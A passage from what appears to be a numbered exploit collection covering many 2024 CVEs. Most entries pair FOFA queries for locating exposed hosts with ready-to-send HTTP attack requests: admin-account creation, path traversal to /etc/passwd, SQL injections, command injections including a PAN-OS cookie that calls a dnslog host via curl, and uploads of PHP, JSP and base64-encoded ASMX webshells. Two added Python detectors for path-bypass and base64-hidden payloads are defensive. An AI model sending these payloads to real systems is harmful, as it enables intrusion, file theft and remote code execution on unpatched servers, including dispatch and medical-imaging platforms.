User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

The request creates a new user with the SYSTEM_ADMIN role without authentication.

CVE-2024-27199 (path traversal; each of the following paths reaches the admin diagnostic page)
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Script: CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

Error-based injection through the IPAddr field of the nested JSON; the database version is returned in the updatexml error message.

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat /api/cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command-and-dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command-and-dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command-and-dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command-and-dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

Entries 137 to 140 are all time-based blind injections: a vulnerable host answers about 5 seconds later than an unaffected one.

141. Kelixun (科立讯) communication command-and-dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

The response contains the MD5 of 1 (c4ca4238a0b923820dcc509a6f75849b) between two ~ characters when the host is vulnerable.

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog address>`;
Accept-Encoding: gzip

The SESSID value becomes a file name under the telemetry directory; the backticked command runs when the device telemetry job later processes that file, so the DNS callback arrives with a delay rather than in the HTTP response.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

The transport parameter URL-decodes to || (echo '[S]'; id; echo '[E]')#; so the output of id appears between [S] and [E] in the response.

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / server-side template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

validationRules is evaluated server-side as a script with Java classes in reach; ipconfig is for a Windows host (entry 150 is the same request with id for Linux).

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

The request as published carries no injection payload; it shows the unauthenticated reach of the ;swagger-ui/ path prefix (the same trick as entries 149 and 150) to the pageList endpoint.

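Entries 126 (aiohttp), 132 (TeamCity, CVE-2024-27198 and CVE-2024-27199), 147 (RaidenMAILD) and 149 to 151 (AJ-Report) reach protected resources the same way: the path as written in the request differs from the path the server resolves, because of .. segments, a ; path parameter that an access-control filter matching on the raw URI treats differently from the servlet mapping, or a path-like value tucked into a query parameter. The Python below is an added detection example, not code from this post or from any of the vendors named above. It takes constructed access-log lines (the request targets are the ones quoted in the entries, the client addresses and timestamps are invented), computes the effective path the way a servlet container or static-file handler would, and reports requests whose effective path lands in a restricted area without being requested literally. RESTRICTED_PREFIXES and the Combined Log Format are assumptions to adapt.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log sample (Combined Log Format). Client addresses and
# timestamps are invented; the request targets are the ones quoted in the
# entries above. The last two lines are ordinary requests and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jun/2024:10:01:02 +0000] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 311
203.0.113.5 - - [04/Jun/2024:10:01:03 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 9021
203.0.113.5 - - [04/Jun/2024:10:01:04 +0000] "GET /static/../../../../../etc/passwd HTTP/1.1" 200 2214
203.0.113.5 - - [04/Jun/2024:10:01:05 +0000] "GET /;swagger-ui/dataSource/pageList?pageSize=10 HTTP/1.1" 200 742
203.0.113.5 - - [04/Jun/2024:10:01:06 +0000] "GET /webeditor/../../../windows/win.ini HTTP/1.1" 200 403
198.51.100.7 - - [04/Jun/2024:10:02:00 +0000] "GET /static/app.js HTTP/1.1" 200 18822
198.51.100.7 - - [04/Jun/2024:10:02:01 +0000] "GET /admin/diagnostic.jsp HTTP/1.1" 302 0
"""

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+"')

# Areas that should only be reachable by their literal path. Hypothetical list
# for this example; an operator fills it in from the application's own routes.
RESTRICTED_PREFIXES = ("/admin/", "/app/rest/", "/etc/", "/windows/", "/dataSource/")


def effective_path(raw_path):
    """Resolve raw_path the way a servlet container or static-file handler does:
    percent-decode, drop ';param' path parameters from every segment, collapse
    repeated slashes, then resolve '.' and '..' against the root."""
    segments = [re.sub(r";.*", "", seg) for seg in unquote(raw_path).split("/")]
    collapsed = re.sub(r"/+", "/", "/".join(segments)) or "/"
    return posixpath.normpath(collapsed)


def classify_target(target):
    """Return (effective_path, reasons) for one request target (path plus query)."""
    parts = urlsplit(target)
    raw_path = unquote(parts.path)
    reasons = []
    if ".." in raw_path.split("/"):
        reasons.append("traversal")
    if ";" in raw_path:
        reasons.append("path-parameter")
    effective = effective_path(parts.path)
    # A query value that is itself a path with a ';' suffix (the TeamCity
    # ?jsp=...;.jsp shape) is resolved as if it were the request path.
    for pair in parts.query.split("&"):
        value = unquote(pair.partition("=")[2])
        if value.startswith("/") and ";" in value:
            reasons.append("path-like query value with path-parameter")
            effective = effective_path(value)
    if effective != raw_path and effective.startswith(RESTRICTED_PREFIXES):
        reasons.append("effective path enters a restricted prefix")
    return effective, reasons


def scan_log(text):
    """Parse each log line and return the requests that carry a bypass signal."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        effective, reasons = classify_target(m["target"])
        if reasons:
            hits.append({"client": m["client"], "method": m["method"],
                         "target": m["target"], "effective": effective,
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["client"]} {hit["method"]} {hit["target"]}'
              f' -> {hit["effective"]} [{", ".join(hit["reasons"])}]')
```

Run against the sample, the five requests from the first client are reported and the two ordinary requests are not; the literal /admin/diagnostic.jsp is left alone because its effective path equals the path requested, which is what the access-control layer already handles. The same classify_target check, applied before routing, is a reasonable server-side guard for applications that cannot be patched immediately.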

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA), LoadMaster <= 7.2.54.8 (LTSF), LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. the command is injected through the username part of the Basic credentials.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

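Entries 122, 144 and 152 carry their payload base64-encoded: the sql query parameter, the system query parameter (aWQ= is id) and the Basic Authorization credential. A rule that looks for SQL keywords or shell metacharacters in the raw request sees nothing in any of them. The Python below is an added example, not part of the original post or of any of these vendors' code: it decodes every query value and Basic credential that is valid base64 for printable text and classifies what came out. The four sample requests are constructed from the values quoted above plus one ordinary call with admin:s3cret credentials; the metacharacter, keyword and command-name lists are assumptions to tune for the environment.

```python
import base64
import binascii
import re

SHELL_META = re.compile(r"[;|`]|\$\(|\$\{IFS\}")
SQL_WORDS = re.compile(r"\b(select|union|sleep|updatexml|extractvalue)\b", re.I)
COMMAND_NAMES = {"id", "ls", "cat", "whoami", "uname", "wget", "curl", "sh", "bash", "nc"}

# Constructed requests reduced to the lines that matter. The three payload
# values are the ones quoted in entries 122, 144 and 152; the fourth request is
# an ordinary call with Basic credentials (admin:s3cret) and must not be flagged.
S200_REQ = ("GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1\r\n"
            "Host: x.x.x.x\r\n\r\n")
DLINK_REQ = ("GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1\r\n"
             "Host: x.x.x.x\r\n\r\n")
LOADMASTER_REQ = ("GET /access/set?param=enableapi&value=1 HTTP/1.1\r\n"
                  "Host: x.x.x.x\r\n"
                  "Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=\r\n\r\n")
BENIGN_REQ = ("GET /access/set?param=enableapi&value=1 HTTP/1.1\r\n"
              "Host: x.x.x.x\r\n"
              "Authorization: Basic YWRtaW46czNjcmV0\r\n\r\n")


def decode_b64(value):
    """Return the decoded text if value is base64 for printable UTF-8, else None.
    Missing '=' padding is tolerated, since several of the PoCs above omit it."""
    padded = value + "=" * (-len(value) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return text if text and text.isprintable() else None


def classify(text):
    """Name the kind of payload found in decoded text, or None if it looks benign."""
    if SHELL_META.search(text):
        return "shell metacharacters"
    if SQL_WORDS.search(text):
        return "sql"
    tokens = text.split()
    if tokens and tokens[0].lower() in COMMAND_NAMES:
        return "shell command"
    return None


def iter_encoded_fields(raw_request):
    """Yield (location, value) for every place a base64 blob may be hiding:
    each query parameter value and the credential of a Basic Authorization header."""
    head = raw_request.partition("\r\n\r\n")[0]
    request_line, *header_lines = head.split("\r\n")
    target = request_line.split(" ")[1]
    query = target.partition("?")[2]
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            yield f"query:{key}", value
    for line in header_lines:
        name, _, value = line.partition(":")
        if name.strip().lower() == "authorization":
            scheme, _, cred = value.strip().partition(" ")
            if scheme.lower() == "basic":
                yield "header:Authorization", cred.strip()


def inspect_request(raw_request):
    """Decode and classify every candidate field; return only the suspicious ones."""
    findings = []
    for where, value in iter_encoded_fields(raw_request):
        decoded = decode_b64(value)
        if decoded is None:
            continue
        kind = classify(decoded)
        if kind:
            findings.append({"where": where, "raw": value, "decoded": decoded, "kind": kind})
    return findings


if __name__ == "__main__":
    for name, req in [("S200", S200_REQ), ("D-Link", DLINK_REQ),
                      ("LoadMaster", LOADMASTER_REQ), ("benign", BENIGN_REQ)]:
        print(name, inspect_request(req))
```

Values that are not valid base64, or decode to bytes that are not printable text, are skipped, so ordinary parameters such as enableapi or a numeric cmd=15 produce no noise; abc12345cba (the passwd value in entry 144) decodes cleanly but matches nothing and is likewise not reported. In a WAF or log pipeline the same decode step should also be applied to cookies and JSON string values.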

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config and take a component id from the components list
http://x.x.x.x/config

Step 2: make the server copy /etc/passwd into its temporary file cache
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy (the response to step 2 gives the cache path)
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

Time-based blind injection through the gsdwid field against a PostgreSQL backend (PG_SLEEP): a vulnerable host answers about 5 seconds late.

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file at the path echoed in the response, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达医学影像存档与通信系统 WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
